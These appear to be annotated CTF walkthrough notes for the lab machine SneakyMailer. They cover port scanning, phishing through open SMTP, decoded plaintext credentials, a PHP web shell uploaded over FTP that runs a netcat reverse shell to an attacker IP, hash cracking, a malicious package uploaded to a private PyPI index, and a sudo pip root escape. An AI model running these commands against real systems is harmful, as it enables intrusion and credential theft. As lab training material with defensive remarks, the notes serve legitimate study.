# TCP sweep of all 65535 ports (-p-) with -A (OS detection, version detection,
# script scanning, traceroute); the script selection is the "vuln" NSE category.
# --min-rate=10000 keeps the send rate at or above 10000 packets per second and
# --script-timeout=15 caps each script at 15 seconds, so this pass trades
# completeness for speed. -oA writes output.nmap, output.xml and output.gnmap.
# A sweep at this rate is loud and should stand out in firewall and IDS logs.
nmap -A -p- -oA output 10.129.2.28 --min-rate=10000 --script=vuln --script-timeout=15 -v
# Second TCP pass over the same port range at nmap's default timing: default
# scripts (-sC), service/version detection (-sV) and OS detection (-O).
# Results are saved under the "sneakymailer" prefix.
nmap -sC -sV -O -p- -oA sneakymailer 10.129.2.28
# UDP scan (-sU) of the full port range, saved under "sneakymailer-udp".
# NOTE(review): a full-range UDP scan is normally very slow - confirm it was
# left to finish before relying on its output.
nmap -sU -O -p- -oA sneakymailer-udp 10.129.2.28
# Web server scan of the HTTP service on port 80 (-h names the target host).
nikto -h 10.129.2.28:80
# Map the three virtual-host names to the target address in the local
# resolver file; tee -a appends, and sudo is needed because /etc/hosts is
# root-owned.
printf '%s\n' "10.129.2.28 sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb" \
  | sudo tee -a /etc/hosts

# Fetch the staff page, render the HTML as text, keep the lines that mention
# the mail domain and save the last whitespace-separated field of each one
# to ./users (one address per line).
curl -s "http://sneakycorp.htb/team.php" \
  | html2text \
  | grep "sneakymailer.htb" \
  | awk 'NF{print $NF}' >users

# Print the collected addresses as a single comma-separated line.
tr '\n' ',' <users
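# Submit one message through the target's SMTP service with swaks. No
# authentication options are passed and the sender is an address in the
# organisation's own domain, so delivery depends on the server accepting
# unauthenticated mail for that sender. Requiring SMTP AUTH on submission and
# rejecting unauthenticated mail that claims an internal sender would stop
# this step.
# NOTE(review): the --to value is abbreviated in these notes ("....."); the
# full list is presumably the addresses gathered in ./users - confirm.
swaks --from "cu3rv0x@sneakycorp.htb" --to "tigernixon@sneakymailer.htb....." --header "Subject: README" --body "Da click http://10.10.14.120/test" --server 10.129.2.28
# Local HTTP server on port 80 (a privileged port, hence sudo); it logs each
# incoming request line. The standard-library module is http.server; the
# notes had it misspelt as "htt.server", which python3 -m cannot import.
sudo python3 -m http.server 80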
Vemos información de Paul
php --interactive
echo urldecode("1
firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt")
Credenciales-> paulbyrd:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
a1 OK LOGIN
a2 OK LIST completed
a3 EXAMINE "INBOX"
a4 EXAMINE "INBOX.Trash"
a5 EXAMINE "INBOX.Sent"
a6 EXAMINE "INBOX.Deleted Items"
a7 EXAMINE "INBOX.Sent Items"
a10 OK FETCH
a11 FETCH 2 body[]
cat credentials.txt
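# Virtual-host enumeration: FUZZ in the Host header is replaced by each
# wordlist entry while the request always goes to http://sneakycorp.htb.
# -c colours the output, -t 200 sets 200 concurrent connections and --hh=185
# hides responses that are 185 characters long (presumably the size of the
# default-vhost answer - confirm against a baseline request).
# The wordlist has to be introduced with -w; the notes omitted the flag.
# A burst of requests with rotating Host headers from one client is easy to
# spot in web server access logs.
wfuzz -c --hh=185 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" http://sneakycorp.htb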
http://dev.sneakycorp.htb
ftp 10.129.2.28
paulbyrd:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
put cu3rv0x.php
http://dev.sneakycorp.htb/cu3rv0x.php?cmd=whoami
http://dev.sneakycorp.htb/cu3rv0x.php?cmd=nc -e /bin/bash 10.10.14.120 443
# Listener on TCP 443: -l listen, -v verbose, -n no DNS lookups, -p port.
nc -lvnp 443
# Host triage: kernel version and architecture, then distribution release.
uname -a
lsb_release -a
# List files with the setuid bit set (-perm -4000), discarding permission
# errors. "\-perm" is plain "-perm" once the shell removes the backslash, and
# with no start path GNU find searches from the current directory.
find \-perm -4000 2>/dev/null
# Long listing of the current directory, hidden files included.
ls -al
# .htpasswd stores HTTP basic-auth entries as user:hash. Being readable by the
# account running this shell is what allows the hash to be taken offline;
# the file should be readable only by the web server and kept out of any
# directory that other accounts or the FTP service can reach.
cat .htpasswd
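# Offline dictionary run against the file "hash" (presumably the entry taken
# from .htpasswd - confirm). The wordlist directory is /usr/share/wordlists,
# as used by the wfuzz command earlier in these notes; "worldlists" was a typo
# and john would fail to open the file.
# A password that is recovered from a public wordlist is a weak-password
# finding in its own right.
john --wordlist=/usr/share/wordlists/rockyou.txt hash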
soufianeelhaoui
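# Read the nginx site definition for the package index. The configuration
# directory is /etc/nginx; the notes had it misspelt as "ngnix".
cat /etc/nginx/sites-available/pypi
# Find the process serving the index (forest view, all users). The grep
# process itself also matches and appears in the output.
ps -faux | grep "pypi"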
http://pypi.sneakycorp.htb:8080
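# Scaffold a minimal Python package: project directory "reverse" containing a
# package directory "reverse" with an empty __init__.py.
# The notes ran touch before the inner directory existed and then repeated
# both commands; the inner mkdir has to come first and one pass is enough.
mkdir reverse
cd reverse
mkdir reverse
touch reverse/__init__.py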
# Show the resulting project layout.
tree
# setup.py is executed by whoever builds or installs the package, so its
# contents are code rather than metadata (the file itself is not reproduced in
# these notes).
cat setup.py
# ~/.pypirc conventionally holds the index-server URL and the credentials for
# each repository alias; the alias used below is "reverse".
cat ~/.pypirc
# Build a source distribution and upload it to the repository named "reverse"
# in ~/.pypirc.
# NOTE(review): "setup.py upload" is deprecated upstream in favour of twine.
# An index that accepts uploads and then builds or installs them runs the
# uploader's setup.py under the index's own account (presumably what happens
# here, given the listener that follows - confirm). Upload credentials should
# therefore be treated as code-execution credentials.
python setup.py sdist upload -r reverse
# Listener on TCP 443 (privileged port, hence sudo).
sudo nc -lvnp 443
# List the sudo rules granted to the current account.
sudo -l
https://gtfobins.github.io/gtfobins/pip/
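# Pattern from the GTFOBins pip page linked above. "pip install <dir>" runs
# that directory's setup.py, and under sudo it runs as root, so a sudoers
# entry that permits pip install is equivalent to unrestricted root.
# The fix belongs in sudoers: remove the rule rather than try to constrain
# pip's arguments.
TF=$(mktemp -d)
# The string is double-quoted, so $(tty) is expanded here by the current
# shell and the generated setup.py contains the literal terminal device path.
# Expansions of TF are quoted so the path is passed as a single word.
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > "$TF/setup.py"
sudo pip install "$TF"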